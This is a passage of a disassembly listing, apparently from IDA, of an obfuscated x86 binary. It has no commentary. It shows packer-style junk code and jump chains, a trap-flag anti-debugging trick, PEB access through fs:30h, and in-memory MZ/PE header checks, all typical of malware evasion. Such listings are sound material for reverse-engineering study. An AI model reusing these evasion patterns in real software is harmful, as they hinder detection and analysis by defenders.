; ---------------------------------------------------------------------------
sub esi, edi
jmp loc_4295CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_426F33: ; CODE XREF: sub_425B6E:loc_4264DD�j
; _0182ofla:004264FF�j
or edi, 9DBFDA9h
add edi, 0E646D225h
call sub_425C55
loc_426F44: ; CODE XREF: sub_42A181+49C�j
or edi, 0A6429D05h
popf
not ebp
cmp ebp, 0C0F0BBAEh
jmp loc_424D33
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_426F58: ; CODE XREF: sub_4267F8-2AF7�j
push offset loc_4270DF
jmp nullsub_128
; END OF FUNCTION CHUNK FOR sub_4267F8
; ---------------------------------------------------------------------------
dw 8A0Fh
dd 0FFFFDF3Bh, 1F89E9h
db 0
; ---------------------------------------------------------------------------
loc_426F6D: ; CODE XREF: _0182ofla:00424B52�j
jz loc_42AEC3
or ecx, edx
mov edx, 41D76A1Dh
sub ebx, 83FCFED6h
mov eax, 21557C6Fh
pop eax
pop edx
jmp loc_42CD3F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_426F8C: ; CODE XREF: sub_423A2A:loc_428980�j
mov ds:dword_427A20, eax
loc_426F91: ; CODE XREF: sub_42CA66+B�j
; sub_42DBF0:loc_42D379�j ...
jns loc_424B04
cmp ds:dword_427A24, 0
jnz loc_42806F
jmp loc_42ECFF
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
db 0Eh
; ---------------------------------------------------------------------------
loc_426FAA: ; CODE XREF: _0182ofla:loc_426FAC�j
xor cl, bl
loc_426FAC: ; DATA XREF: _0182ofla:00427646�r
; _0182ofla:0042B449�w
loop loc_426FAA
; ---------------------------------------------------------------------------
dw 0BEEEh
dd 0B1BBF398h
dword_426FB4 dd 0FBCEFCE6h ; DATA XREF: sub_425C89+1C2A�r
dword_426FB8 dd 0 ; DATA XREF: sub_4249EF:loc_4249F3�w
; sub_4249FA+B0C�w
; ---------------------------------------------------------------------------
loc_426FBC: ; CODE XREF: _0182ofla:loc_428ED6�j
mov eax, [ebp-4]
cmp word ptr [eax], 5A4Dh
jnz loc_42D884
mov eax, [ebp-4]
cmp dword ptr [eax+3Ch], 0
jz loc_42D884
jmp loc_42E32B
; ---------------------------------------------------------------------------
loc_426FDC: ; DATA XREF: sub_4286A8-3219�o
push 0
push ebx
push 4AD7A188h
pop ebx
add ebx, 0B56A9E3Fh
xchg ebx, [esp]
jmp loc_42753B
; ---------------------------------------------------------------------------
loc_426FF3: ; DATA XREF: sub_424184+7654�o
call sub_42D71D
push eax
; START OF FUNCTION CHUNK FOR sub_42940E
loc_426FF9: ; CODE XREF: sub_42940E:loc_4243CE�j
call sub_42AD20
loc_426FFE: ; DATA XREF: sub_42B73E+18�o
mov eax, [ebp-8]
push eax
call sub_42371C
pushf
mov [esp+8+var_8], eax
jmp loc_42E8D8
; END OF FUNCTION CHUNK FOR sub_42940E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_155. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_427011: ; CODE XREF: sub_423FCD+88CD�j
jmp loc_4286A3
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_427016: ; CODE XREF: sub_425B00+32E4�j
jmp nullsub_53
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42701B: ; CODE XREF: sub_42798F-680�j
rol eax, 1Ah
jmp loc_42B45A
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_427023: ; CODE XREF: _0182ofla:loc_42CC9A�j
push offset sub_42AE14
jmp loc_42A99D
; ---------------------------------------------------------------------------
test esi, 0BF1886E5h
jmp loc_42A35C
; ---------------------------------------------------------------------------
loc_427038: ; CODE XREF: _0182ofla:00428878�j
jge loc_428FE3
cmp ebx, 836E830Eh
jmp loc_4286C2
; ---------------------------------------------------------------------------
loc_427049: ; CODE XREF: _0182ofla:0042383B�j
test esi, 4C4D7A3h
jmp loc_427C7E
; ---------------------------------------------------------------------------
loc_427054: ; CODE XREF: _0182ofla:00426A4E�j
jo loc_423C2F
; =============== S U B R O U T I N E =======================================
sub_42705A proc near ; CODE XREF: sub_424C61+A�p
mov [esp+0], ebx
pop ebx
mov eax, [ebp+8]
push eax
loc_427062: ; CODE XREF: _0182ofla:00423641�j
jmp loc_42C1D6
sub_42705A endp
; ---------------------------------------------------------------------------
loc_427067: ; CODE XREF: _0182ofla:loc_426B7E�j
jnz loc_425911
jmp loc_427484
; ---------------------------------------------------------------------------
loc_427072: ; DATA XREF: sub_4280B6+A�o
mov [ecx+0B8h], eax
; START OF FUNCTION CHUNK FOR sub_423726
loc_427078: ; CODE XREF: sub_423726+7868�j
pop ecx
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_423726
; ---------------------------------------------------------------------------
loc_42707C: ; DATA XREF: sub_423726+4�o
; sub_4280B6+4�o
pop large dword ptr fs:0
add esp, 4
jmp loc_42879E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_42708B: ; CODE XREF: sub_426571+2275�j
cdq
add eax, [esp+0]
adc edx, [esp+4]
jmp loc_426E39
; ---------------------------------------------------------------------------
loc_427098: ; CODE XREF: sub_426571:loc_423C0A�j
mov eax, [ebp-4]
call sub_426E44
mov [ebp-8], eax
jmp loc_4245F9
; END OF FUNCTION CHUNK FOR sub_426571
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_4270A8: ; CODE XREF: sub_428F20:loc_42E833�j
test edi, 33B46DE4h
jmp loc_428CE0
; END OF FUNCTION CHUNK FOR sub_428F20
; =============== S U B R O U T I N E =======================================
sub_4270B3 proc near ; DATA XREF: _0182ofla:0042DFD6�o
push ebp
lea eax, [ebp-4]
push offset sub_428AE1
jmp nullsub_245
sub_4270B3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C718
loc_4270C1: ; CODE XREF: sub_42C718:loc_4290E6�j
xchg eax, [esp+8+var_8]
or eax, 100h
xchg eax, [esp+8+var_8]
popf
nop
jmp loc_42C6B3
; END OF FUNCTION CHUNK FOR sub_42C718
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_4270D4: ; CODE XREF: sub_42B1F9-7389�j
jz nullsub_203
jmp loc_424528
; END OF FUNCTION CHUNK FOR sub_42B1F9
; ---------------------------------------------------------------------------
loc_4270DF: ; DATA XREF: sub_4267F8:loc_426F58�o
jnz loc_42DCC6
mov eax, [ebp-8]
mov byte ptr [eax], 0
mov esp, ebp
pop ebp
jmp loc_424C08
; ---------------------------------------------------------------------------
loc_4270F3: ; CODE XREF: _0182ofla:0042A5F7�j
jnz loc_428C3D
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4270F9: ; CODE XREF: sub_42798F-35DE�j
; sub_42798F:loc_4287FD�j ...
jnz loc_42D00A
mov eax, [ebp+8]
test byte ptr [eax-10h], 38h
jnz loc_428C3D
jmp loc_429470
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424498
loc_427111: ; CODE XREF: sub_424498:loc_427435�j
pop ecx
push offset sub_426851
jmp loc_4284C6
; END OF FUNCTION CHUNK FOR sub_424498
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_26. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F0F
loc_42711E: ; CODE XREF: sub_428F0F+3F4C�j
jmp loc_4232AF
; END OF FUNCTION CHUNK FOR sub_428F0F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42938A
loc_427123: ; CODE XREF: sub_42938A-1648�j
jmp loc_4246D4
; END OF FUNCTION CHUNK FOR sub_42938A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_427128: ; CODE XREF: sub_423A2A+126D�j
call sub_423FCD
test al, al
jz loc_42800B
jmp loc_42427E
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D950
loc_42713A: ; CODE XREF: sub_42D950:loc_425E7B�j
call sub_42C677
loc_42713F: ; CODE XREF: sub_427802+657D�j
jmp sub_42B14D
; END OF FUNCTION CHUNK FOR sub_42D950
; ---------------------------------------------------------------------------
dword_427144 dd 0 ; DATA XREF: _0182ofla:00429297�w
; sub_42CCE0�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA15
loc_427148: ; CODE XREF: sub_42EA15-5DA3�j
jmp loc_42DFE7
; END OF FUNCTION CHUNK FOR sub_42EA15
; ---------------------------------------------------------------------------
db 0DAh, 15h, 0F3h
dword_427150 dd 0 ; DATA XREF: _0182ofla:00426336�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_427154: ; CODE XREF: sub_4231F3+B6A6�j
jmp nullsub_200
; END OF FUNCTION CHUNK FOR sub_4231F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C89
loc_427159: ; CODE XREF: sub_425C89+8774�j
jmp loc_4278B2
; END OF FUNCTION CHUNK FOR sub_425C89
; ---------------------------------------------------------------------------
dw 0B791h
dd 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_427164: ; CODE XREF: sub_426571-2B9A�j
jmp loc_42CB85
; END OF FUNCTION CHUNK FOR sub_426571
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
jmp loc_4272D1
; ---------------------------------------------------------------------------
and esi, ebp
jmp sub_4253F4
; ---------------------------------------------------------------------------
loc_427178: ; DATA XREF: sub_42CB00+20A1�o
add eax, 0FC0FB2E6h
xchg eax, [esp]
jmp loc_429F0C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DB
loc_427186: ; CODE XREF: sub_4278DB:loc_4278E0�j
mov ecx, 0A998AE61h
popf
jle loc_4291DC
jmp loc_4297F8
; END OF FUNCTION CHUNK FOR sub_4278DB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_90. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9A5
loc_427198: ; CODE XREF: sub_42E9A5-69B9�j
jmp loc_42813D
; END OF FUNCTION CHUNK FOR sub_42E9A5
; =============== S U B R O U T I N E =======================================
sub_42719D proc near ; CODE XREF: _0182ofla:0042902D�j
; sub_42D056+3CA�p
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 00425D46 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427D77 SIZE 00000012 BYTES
xchg edx, [esp+0]
pop edx
push edx
xchg ecx, edx
mov ecx, [esp+arg_C]
jmp loc_425D46
sub_42719D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4271AD proc near ; CODE XREF: sub_423FCD+6�p
; sub_424184+2104�j
; FUNCTION CHUNK AT 0042CC8B SIZE 0000000E BYTES
mov [esp+0], edi
pop edi
mov eax, ds:dword_42577C
loc_4271B7: ; CODE XREF: _0182ofla:loc_4282B2�j
or eax, eax
jnz loc_42C895
push 0
jmp loc_42CC8B
sub_4271AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4271C6: ; CODE XREF: _0182ofla:0042635F�j
jnz loc_4296A6
jmp loc_42D0D0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_127. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4271D2 proc near ; CODE XREF: sub_42798F-429B�p
; _0182ofla:0042586F�p ...
; FUNCTION CHUNK AT 0042505E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042588B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00429213 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00429C31 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042A11B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A701 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B56A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B696 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C695 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C6DB SIZE 0000000A BYTES
jb loc_42589C
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_429213
sub_4271D2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop eax
pop eax
push eax
push 0FFFFFFFFh
push eax
jmp loc_42A104
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_4271EF: ; CODE XREF: sub_42660C+12A1�j
js loc_429002
ror ebx, 0Eh
test ebp, eax
jmp loc_425F33
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_4271FF: ; CODE XREF: sub_4253F4:loc_42C6C7�j
or edx, 0C7EBF499h
jmp loc_42B6A2
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4242FD
loc_42720A: ; CODE XREF: sub_4242FD+5347�j
jge loc_42E1FF
; END OF FUNCTION CHUNK FOR sub_4242FD
; START OF FUNCTION CHUNK FOR sub_42D15D
loc_427210: ; CODE XREF: sub_42D15D+C�j
jmp loc_429533
; END OF FUNCTION CHUNK FOR sub_42D15D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A420
loc_427215: ; CODE XREF: sub_42A420+10�j
jmp loc_424202
; END OF FUNCTION CHUNK FOR sub_42A420
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42721A: ; CODE XREF: sub_42798F+1107�j
jmp sub_42E97E
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
popf
jmp loc_42E1FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E79C
loc_427225: ; CODE XREF: sub_42E79C+16�j
add esi, 110673D7h
mov [esi], eax
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_42E79C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C89
loc_42722F: ; CODE XREF: sub_425C89+1C32�j
rol eax, 0Bh
push eax
retn
; END OF FUNCTION CHUNK FOR sub_425C89
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232CD
loc_427234: ; CODE XREF: sub_4232CD+C�j
jmp nullsub_222
; END OF FUNCTION CHUNK FOR sub_4232CD
; =============== S U B R O U T I N E =======================================
sub_427239 proc near ; CODE XREF: sub_425063-9E8�p
; sub_4286E4+4�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004245D8 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00424671 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00424D64 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00424F8C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00426F1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427540 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042AC19 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042C5DA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C794 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042E60A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042E697 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EBF0 SIZE 0000000E BYTES
jnb sub_4249FA
jmp loc_424D64
sub_427239 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_427244: ; CODE XREF: _0182ofla:00423032�j
push ebp
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_427245: ; CODE XREF: sub_42B15E-8139�j
add eax, 7249D4CCh
add eax, ebp
add eax, 8E91348Dh
jmp loc_426C9D
; END OF FUNCTION CHUNK FOR sub_42B15E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_212. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427259 proc near ; CODE XREF: sub_42D056+DD5�p
; sub_426B01:loc_42E07A�j
; FUNCTION CHUNK AT 00423FBC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426872 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426C49 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004273CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004276FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428662 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428A9B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042AE74 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042C3A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C3E3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042C69A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042CBC3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042D081 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DD3B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ECE1 SIZE 00000008 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_4276FE
sub_427259 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42340D
loc_427264: ; CODE XREF: sub_42340D+1CA8�j
jz loc_42620C
; END OF FUNCTION CHUNK FOR sub_42340D
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42726A: ; CODE XREF: sub_428D63:loc_42420D�j
jmp loc_42525F
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
loc_42726F: ; CODE XREF: _0182ofla:loc_42CB7B�j
jnz loc_426C49
pushf
add esi, 0FD2FDCCh
jmp loc_426C40
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427797
loc_427281: ; CODE XREF: sub_427797:loc_426662�j
push offset loc_423592
jmp locret_427BB1
; END OF FUNCTION CHUNK FOR sub_427797
; ---------------------------------------------------------------------------
loc_42728B: ; CODE XREF: _0182ofla:loc_426D4D�j
call sub_42D8EA
; START OF FUNCTION CHUNK FOR sub_4295D6
loc_427290: ; CODE XREF: sub_4295D6:loc_42A3BD�j
mov ds:dword_424BEC, eax
retn
; END OF FUNCTION CHUNK FOR sub_4295D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2FA
loc_427297: ; CODE XREF: sub_42A2FA+13�j
jmp loc_42A84B
; END OF FUNCTION CHUNK FOR sub_42A2FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4295D6
loc_42729C: ; CODE XREF: sub_4295D6-4602�j
; sub_428110+6�j
call sub_42566E
; END OF FUNCTION CHUNK FOR sub_4295D6
; START OF FUNCTION CHUNK FOR sub_42CCE0
loc_4272A1: ; CODE XREF: sub_42CCE0+E�j
jmp loc_4261E7
; END OF FUNCTION CHUNK FOR sub_42CCE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CDE
loc_4272A6: ; CODE XREF: sub_427CDE:loc_427CF5�j
jmp loc_42EC76
; END OF FUNCTION CHUNK FOR sub_427CDE
; ---------------------------------------------------------------------------
loc_4272AB: ; CODE XREF: _0182ofla:0042B3F3�j
mov edx, [ebp+8]
call sub_42945B
loc_4272B3: ; CODE XREF: _0182ofla:00423501�j
jmp locret_426712
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_44. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CD0
loc_4272B9: ; CODE XREF: sub_427CD0+3217�j
jmp nullsub_185
; END OF FUNCTION CHUNK FOR sub_427CD0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_4272BE: ; CODE XREF: sub_42537E:loc_42E853�j
jg loc_4240E3
adc ecx, ebp
cmp ebp, 6A4760DBh
jmp loc_42EC48
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
loc_4272D1: ; CODE XREF: _0182ofla:0042716C�j
push ebx
push ecx
push edx
push eax
jo loc_42435D
sub ebx, eax
jmp loc_4236D0
; ---------------------------------------------------------------------------
loc_4272E2: ; CODE XREF: _0182ofla:00423E2D�j
xor eax, edx
; =============== S U B R O U T I N E =======================================
sub_4272E4 proc near ; CODE XREF: sub_42469C+5�p
; FUNCTION CHUNK AT 004277F5 SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
pop ebp
jmp loc_4277F5
sub_4272E4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42493A
loc_4272EE: ; CODE XREF: sub_42493A+5CEE�j
jnb loc_4236F0
; END OF FUNCTION CHUNK FOR sub_42493A
; =============== S U B R O U T I N E =======================================
sub_4272F4 proc near ; CODE XREF: sub_429B69:loc_423B8E�j
var_20 = dword ptr -20h
; FUNCTION CHUNK AT 0042B298 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CE0F SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042DDC3 SIZE 0000000C BYTES
push ebp
push esi
push edi
push ebx
push ecx
mov eax, esp
push 0
jmp loc_42B298
sub_4272F4 endp
; ---------------------------------------------------------------------------
xchg ecx, [edi]
jmp sub_42CEA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_427309: ; CODE XREF: sub_42798F:loc_426BA4�j
jnz loc_42B461
jmp loc_42701B
; END OF FUNCTION CHUNK FOR sub_42798F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_78. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_427315: ; CODE XREF: sub_4298DD+591�j
jnp loc_426B53
loc_42731B: ; CODE XREF: sub_4298DD:loc_4251D8�j
xor edi, 6723FB87h
add edi, 4067C069h
xchg edi, [esp+0]
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D833
loc_42732F: ; CODE XREF: sub_42D833+C�j
pop ebp
mov eax, ds:dword_42D124
or eax, eax
jnz loc_42DB9C
jmp loc_42ED2E
; END OF FUNCTION CHUNK FOR sub_42D833
; ---------------------------------------------------------------------------
shl edi, 17h
ror esi, 1Eh
jmp sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_42734E: ; CODE XREF: sub_423861:loc_424666�j
cmp al, 0C2h
jz loc_42A2ED
mov eax, [ebp+var_4]
loc_427359: ; CODE XREF: _0182ofla:0042C9B3�j
mov ax, [eax]
and ax, 38FFh
cmp ax, 20FFh
jz loc_42A2ED
jmp loc_42E04A
; END OF FUNCTION CHUNK FOR sub_423861
; ---------------------------------------------------------------------------
loc_42736F: ; CODE XREF: _0182ofla:loc_42AA8B�j
ror eax, 1
mov edi, ebp
jmp loc_423E55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_427378: ; CODE XREF: sub_42660C+1813�j
call sub_424CE4
loc_42737D: ; CODE XREF: sub_42B5C2:loc_42CECF�j
lea eax, loc_42A116
push eax
push 0
push 0
call sub_4258B7
jmp loc_42B767
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
loc_427392: ; DATA XREF: sub_4238F9+A�o
xor edx, edx
push edx
push eax
mov eax, [ebp-18h]
shl eax, 2
cdq
jmp loc_4230DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_4273A2: ; CODE XREF: sub_42D9A4:loc_429798�j
jnz loc_42CB8C
jmp loc_42B4F9
; END OF FUNCTION CHUNK FOR sub_42D9A4
; =============== S U B R O U T I N E =======================================
sub_4273AD proc near ; DATA XREF: _0182ofla:0042E341�o
; FUNCTION CHUNK AT 0042DF23 SIZE 00000002 BYTES
push eax
and edx, ecx
jo loc_42DF23
add eax, edx
mov eax, 1B078F84h
cmp edx, ecx
call sub_42E1DA
sub_4273AD endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_14. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D8EA
loc_4273C5: ; CODE XREF: sub_42D8EA+E�j
jmp loc_42C5AF
; END OF FUNCTION CHUNK FOR sub_42D8EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_4273CA: ; CODE XREF: sub_427259-604�j
jmp loc_42C69A
; END OF FUNCTION CHUNK FOR sub_427259
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_4273CF: ; CODE XREF: sub_4267F8+74DB�j
mov [ebp-0Bh], al
xor eax, eax
mov al, [ebp-0Bh]
mov ecx, 8
loc_4273DC: ; CODE XREF: sub_42E6BF-13CC�j
sub ecx, eax
jmp loc_424DDD
; END OF FUNCTION CHUNK FOR sub_4267F8
; ---------------------------------------------------------------------------
not ebx
add esi, ecx
jmp sub_42D19B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAE0
loc_4273EC: ; CODE XREF: sub_42AAE0:loc_42AAF1�j
call nullsub_9
call sub_428D17
mov edx, 0CF0182F6h
call sub_42B097
mov ds:dword_427A44, eax
; END OF FUNCTION CHUNK FOR sub_42AAE0
; START OF FUNCTION CHUNK FOR sub_42AAD2
loc_427405: ; CODE XREF: sub_42AAE0+B�j
; sub_42AAD2:loc_42ADF3�j ...
mov eax, ds:dword_427A44
jmp loc_42AF45
; END OF FUNCTION CHUNK FOR sub_42AAD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_42740F: ; CODE XREF: sub_42537E:loc_42C9FD�j
jnz loc_42814B
jmp loc_42A2AC
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425499
loc_42741A: ; CODE XREF: sub_425499:loc_42DE64�j
push 0
push 0
lea eax, [ebp-4]
push eax
jmp loc_4259D4
; END OF FUNCTION CHUNK FOR sub_425499
; ---------------------------------------------------------------------------
shr ebp, 17h
jmp sub_42E1DA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_131. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425AB1
loc_427430: ; CODE XREF: sub_425AB1+12�j
jmp loc_42A029
; END OF FUNCTION CHUNK FOR sub_425AB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424498
loc_427435: ; CODE XREF: sub_424498+13�j
jmp loc_427111
; END OF FUNCTION CHUNK FOR sub_424498
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423461
loc_42743A: ; CODE XREF: sub_423461+9�j
; _0182ofla:loc_42384B�j ...
pop large dword ptr fs:0
add esp, 4
retn
; END OF FUNCTION CHUNK FOR sub_423461
; =============== S U B R O U T I N E =======================================
sub_427445 proc near ; CODE XREF: sub_42D15D:loc_423EA4�p
; sub_42D15D+6�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00423DA9 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00425569 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00426B1E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00427536 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427FBE SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042898A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429FC3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B470 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B7E2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042C131 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042D137 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042D760 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042ED54 SIZE 0000001F BYTES
push large dword ptr fs:0
mov large fs:0, esp
loc_427453: ; CODE XREF: _0182ofla:00429C5D�j
mov eax, large fs:30h
jmp loc_423DA9
sub_427445 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42745F proc near ; DATA XREF: sub_4231D5+6C48�o
mov ds:dword_42B8EC, eax
retn
sub_42745F endp
; ---------------------------------------------------------------------------
loc_427465: ; CODE XREF: _0182ofla:0042750E�j
mov edx, 0A22F8A70h
call sub_42B097
push offset sub_42B07D
jmp locret_42D3BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_427479: ; CODE XREF: sub_428D63-2DF6�j
jnz loc_42ABE9
jmp loc_42A17C
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
loc_427484: ; CODE XREF: _0182ofla:0042706D�j
or esi, 5BAFB8FDh
xchg ecx, ebx
